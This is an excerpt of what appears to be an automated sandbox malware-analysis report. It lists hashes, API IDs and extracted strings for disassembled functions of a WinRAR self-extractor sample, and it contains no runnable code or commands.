                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                • Instruction ID: 61103b4f1dcf0ed1d724bf7b2dd0f9c040de9fc3a18487d87b6b9075ed7c2517
                                                                                • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                • Instruction Fuzzy Hash: 6AC19DB7B281908FE350CF7AE400A9D3BB1F39878CB559125DF59A3B09D639DA45CB40
                                                                                Function 00007FF655942D58 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                • Instruction ID: 36c21af0f0f43439774ce4c1a6afd8021feb2c4b8f041f60e4742f7701d3e74f
                                                                                • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                • Instruction Fuzzy Hash: 42A1F37AA081C1C6EB158A64D40C7BDA791FB94B4CF5A4635DA9EA7787DF3CEC818300
                                                                                Function 00007FF65593AF18 Relevance: .2, Instructions: 244COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                • Instruction ID: 9eba5f77fa73b84b26adaa935c2bc3dacaff649e8edc77d253b3198ff973a793
                                                                                • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                • Instruction Fuzzy Hash: 79C12777A291E08DE302CBB5A4248FD3FF2E71E74DB4A4151EF9666B4AC62C5201DF20
                                                                                Function 00007FF65592A310 Relevance: .2, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                • Instruction ID: e1e18e7e723a9fa45ac3990b81c79a67eed7f8a13a7ff8afc4bc58fb5001c9a9
                                                                                • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                • Instruction Fuzzy Hash: F1910267A185C196EB11CF29D8592ED6721FF95B8CF481031EE4EA7A4AEF3CDA45C300
                                                                                Function 00007FF65593B534 Relevance: .2, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                • Instruction ID: 7ce8ff62c2dd00e88244c0be588cbd224d4102a3153ee6b4a18fd7794ea11f0a
                                                                                • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                • Instruction Fuzzy Hash: 6261C236B181D189EB118F7585184FD7FA2E759B88B4A4032CE9EA7647DF2CE905CB10
                                                                                Function 00007FF6559421D0 Relevance: .1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                • Instruction ID: a3745abe63373781f62921198f6ba1d9ebe4e30456073574741aa8d1c0457091
                                                                                • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                • Instruction Fuzzy Hash: 1951F373A181918BEB288F68D01876DB761FB90F48F484134DB999768ADF3DED41CB00
                                                                                Function 00007FF655942AB0 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                • Instruction ID: 5dc10adf944d2e216ee20b647bb9f8bae0e5219885e41a16ad28f13929075c71
                                                                                • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                • Instruction Fuzzy Hash: 5731E5B6A085C18BDB08CE5AD65427EB790F745B48F098139DB9AD3B82DF3CE841C700
                                                                                Function 00007FF6559658E0 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                • Instruction ID: 189ea63dd5d094df0a44edb62460698ab8d9ea4bd41c6f9b21e4c347571c6d94
                                                                                • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                • Instruction Fuzzy Hash: 73F06276B186968BDBA48F29A84262A77D0F708784F88803DD68DC3B05DB3C98609F05
                                                                                Function 00007FF655953354 Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                • Instruction ID: b0b7971300601e76db83b99ed7a1bda7a49740ac940e4a3df2f1cdce67af5bd1
                                                                                • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                • Instruction Fuzzy Hash: 20A0026990CDC2D0E6448F14F9684B42374FF60B09B980071F10DE10A6EF3CAD15C340
                                                                                Function 00007FF65592D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                • API String ID: 3668304517-727060406
                                                                                • Opcode ID: 2f19ab4c30c8eac6d144c901c4549240b956f6a692c877d1095a563e450749ff
                                                                                • Instruction ID: 2a19c02bc1c78b7c4f8c41c725ca7a47e4130f4ad0fd3ec682e8b63294c33655
                                                                                • Opcode Fuzzy Hash: 2f19ab4c30c8eac6d144c901c4549240b956f6a692c877d1095a563e450749ff
                                                                                • Instruction Fuzzy Hash: CA41FC7AB05F4199EB008F60D8583E933A9EB48B98F440136DA4D63B5AEF3CD959C380
                                                                                Function 00007FF655952A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 2565136772-3242537097
                                                                                • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                • Instruction ID: 1fb8e6b597a755e72438a598eeea8bbe8b01e63fe059bdf060bfdb7d3048eeb9
                                                                                • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                • Instruction Fuzzy Hash: 56212F6CE09B8382FE559B91E95C5B463A1AF44F89F4C0435C90EE26A3EF3CEC598350
                                                                                Function 00007FF655936A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                • API String ID: 4097890229-4048004291
                                                                                • Opcode ID: dee26740b612624536d12b2af6dd68e178aeff84bb288dba342f4b8cabb8cc6b
                                                                                • Instruction ID: 4a116e236eaf16a96736a069f22ec8225ed5f7b79bcabb2a1cfff672dbff9b8b
                                                                                • Opcode Fuzzy Hash: dee26740b612624536d12b2af6dd68e178aeff84bb288dba342f4b8cabb8cc6b
                                                                                • Instruction Fuzzy Hash: 4512CD2AB08AC280EB10DB64D4481AD6371EB85F8CF594235DB5DA7BEADF3CD959C340
                                                                                Function 00007FF65594A440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                • API String ID: 431506467-1315819833
                                                                                • Opcode ID: cbdb2342dbc27246140afa92192789482b4dc38f3de2603255fba98438e470aa
                                                                                • Instruction ID: fdd3ef1a7babaf4af26c0581d0ec47b8ecb7bcf6f9b0a657b4bc62e8ee05feac
                                                                                • Opcode Fuzzy Hash: cbdb2342dbc27246140afa92192789482b4dc38f3de2603255fba98438e470aa
                                                                                • Instruction Fuzzy Hash: 59B1C06AF197C285FB008BA4D4482AC2372AF45B9CF484235DA6C76ADADF3CE955C341
                                                                                Function 00007FF65595E650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                • API String ID: 3215553584-2617248754
                                                                                • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                • Instruction ID: 374ce76ff9b0b45cc70aa92aa8819b90a648ac46b10cf11b42e0d55611d369e3
                                                                                • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                • Instruction Fuzzy Hash: 0141D57AA05B8589E714CF24E8557DD33A4EB14B98F084136EE4C93B56DF3DD429C384
                                                                                Function 00007FF65594F390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                • String ID: STATIC
                                                                                • API String ID: 781704138-1882779555
                                                                                • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction ID: 113ea97a2388a679f67956f98cd4c55afe43f36bd5d60e81b7af475c83d9cf72
                                                                                • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction Fuzzy Hash: BE317029B0868286FA609B12A56C7B96391FF89FD8F081434DD9D97B57DF3CEC068740
                                                                                Function 00007FF655946E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                • API String ID: 2721297748-1533471033
                                                                                • Opcode ID: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                • Instruction ID: 9e3678c8724989b2594ac5001ff2cb95d0c624c717421b90b3d2b82583fb0baa
                                                                                • Opcode Fuzzy Hash: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                • Instruction Fuzzy Hash: 3181A06AB18A8685FB00DBA5D8581ED2371AF49B8CF480135CE5DA769BDF3CDD0AC340
                                                                                Function 00007FF65594AE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Text
                                                                                • String ID: LICENSEDLG
                                                                                • API String ID: 1601838975-2177901306
                                                                                • Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                                                • Instruction ID: 2fb9ec56df76d1d6f923bbf3745d3f1630af8f815ee227dcc36debfa3f8eb0c6
